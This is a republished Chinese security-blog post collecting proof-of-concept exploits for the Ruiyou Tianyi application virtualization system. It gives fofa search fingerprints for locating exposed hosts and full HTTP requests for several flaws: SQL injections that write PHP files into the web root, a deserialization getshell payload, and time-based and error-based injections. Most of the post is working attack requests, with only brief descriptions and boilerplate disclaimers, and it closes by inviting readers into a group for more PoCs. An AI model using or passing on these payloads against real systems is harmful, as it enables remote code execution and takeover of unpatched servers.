道一安全(本公众号)的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
漏洞名称:瑞友天翼应用虚拟化系统 ConsoleExternalUploadApi 远程代码执行漏洞
影响版本:5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1
fofa:body="/CasMain.XGI"
介绍:瑞友天翼应用虚拟化系统安装后 Mysql 默认配置就允许直接写入文件,所以就可以利用连接数据库写入文件至 WebRoot 目录下。
POC:
POST /ConsoleExternalUploadApi.XGI HTTP/1.1Host:Content-Length: 102Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin:Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer:Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=guckrv899d484kirp0p1h30b61; CookieLanguageName=ZH-CN; CookieAuthType=0Connection: closekey=ServerIPType'+union+select+'test'+into+outfile+'..\\..\\WebRoot\\ddd.xgi&initParams=x&sign=x
漏洞名称:瑞友天翼应用虚拟化系统 index.php 反序列化注入 Getshell
影响版本:5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1
fofa:body="/CasMain.XGI"
介绍:瑞友天翼应用虚拟化系统旧版本中,存在反序列化漏洞,攻击中可利用该漏洞写入恶意文件,控制服务器。
POC:
POST /ConsoleExternalUploadApi.XGI?key=ServerIPType&initParams=command_uploadAuthorizeKeyFile__user_admin%27+or+%271%27=%271__pwd_2__serverIdStr_1&sign=8091edfafcf0936b64c7d7f2d7bb071f HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=6mollsipigi7imfnj6ovud6t94; CookieLanguageName=ZH-CNUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVSwwKKlDContent-Length: 374------WebKitFormBoundaryVSwwKKlDContent-Disposition: form-data; name="keyFile"; filename="sess_cf1.key"Content-Type: image/png0|1|2|a:1:{s:7:"user_id";s:169:"1') Union Select '<?php phpinfo()?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 into outfile '..\\..\\WebRoot\\1.xgi' -- ";}------WebKitFormBoundaryVSwwKKlD--
POST /index.php HTTP/1.1Host:Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36X-Requested-With: XMLHttpRequestReferer: http://127.0.0.1/index.php?s=/Admin/userlistAccept-Encoding: gzip, deflateAccept-Language: en,zh-CN;q=0.9,zh;q=0.8Cookie: think_language=en; PHPSESSID=p7crcrjhh6balvuscd8kqbu991; UserAuthtype=0; CookieLanguageName=ZH-CNsec-gpc: 1Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 29s=/Index/index&sessId=cf1.key
然后访问
漏洞名称:瑞友天翼应用虚拟化系统 GetBSAppUrl SQL 注入漏洞
影响版本:5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1
fofa:body="/CasMain.XGI"
介绍:瑞友天翼应用虚拟化系统 GetBSAppUrl 存在SQL漏洞,攻击者可以通过精心构造的请求执行任意代码,导致系统被攻击与控制。
POC:
GET /index.php?s=/Agent/GetBSAppUrl/AppID/1'+and+(extractvalue(1,concat(0x7e,(select+md5(1)),0x7e)))+and+'a'='a HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=6mollsipigi7imfnj6ovud6t94; CookieLanguageName=ZH-CNUpgrade-Insecure-Requests: 1
漏洞名称:瑞友天翼应用虚拟化系统 AgentBoard.XGI 远程代码执行漏洞
影响版本:瑞友天翼应用虚拟化系统
fofa:body="/CasMain.XGI"
介绍:瑞友天翼应用虚拟化系统 AgentBoard.XGI 远程代码执行漏洞。
POC:
http://127.0.0.1/AgentBoard.XGI?user=-1%27%20union%20select%201,%27%3C?php%20phpinfo();?%3E%27%20into%20outfile%20%22..\\..\\WebRoot\\test.XGI%22%20--%20-&cmd=UserLogin
然后访问
127.0.0.1:8000/test.XGI
还有一些未复现的漏洞
http://127.0.0.1/ConsoleExternalApi.XGI?key=inner&initParams=command_getAppVisitLogByDataTable__user_admin__pwd_xxx__serverIdStr_1&sign=0a3d5f4f69628f32217ea9704d12bd6d&iDisplayStart=1+union+select+1,2,3,4,5,user()%23http://127.0.0.1/RAPAgent.XGI?CMD=GETApplication&AppID=APP00000003&Language=ZH-CN&User=admin&PWD=e10adc3949ba59abbe56e057f20f883e&AuthType=0&Computer=CMD=GETApplication&AppID=APP00000001&Language=ZH-CN&User=admin&PWD=e10adc3949ba59abbe56e057f20f883e&AuthType=0&Computer=WIN-1TLJMBOFIT6%27%20AND%20(SELECT%209990%20FROM%20(SELECT(SLEEP(5)))Joqo)%20AND%20%27DseX%27=%27DseX&Finger=A45A2E5E3&IP=&Finger=A45A2E5E3&IP=POST /ConsoleExternalApi.XGI?initParams=command_createUser__pwd_1&key=inner&sign=9252fae35ff226ec26c4d1d9566ebbde HTTP/1.1Host:Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip{"account": "1' union select '<?php echo(md5("123"));unlink(__FILE__);?>',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL into outfile '..\\..\\WebRoot\\abc.xgi'#","userPwd": "1"}
http://127.0.0.1/hmrao.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Ctest.xgi%27%23加群获取更多POC
群内不定期更新各种POC
原文始发于微信公众号(道一安全):【漏洞复现】瑞友天翼应用虚拟化系统漏洞合集
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论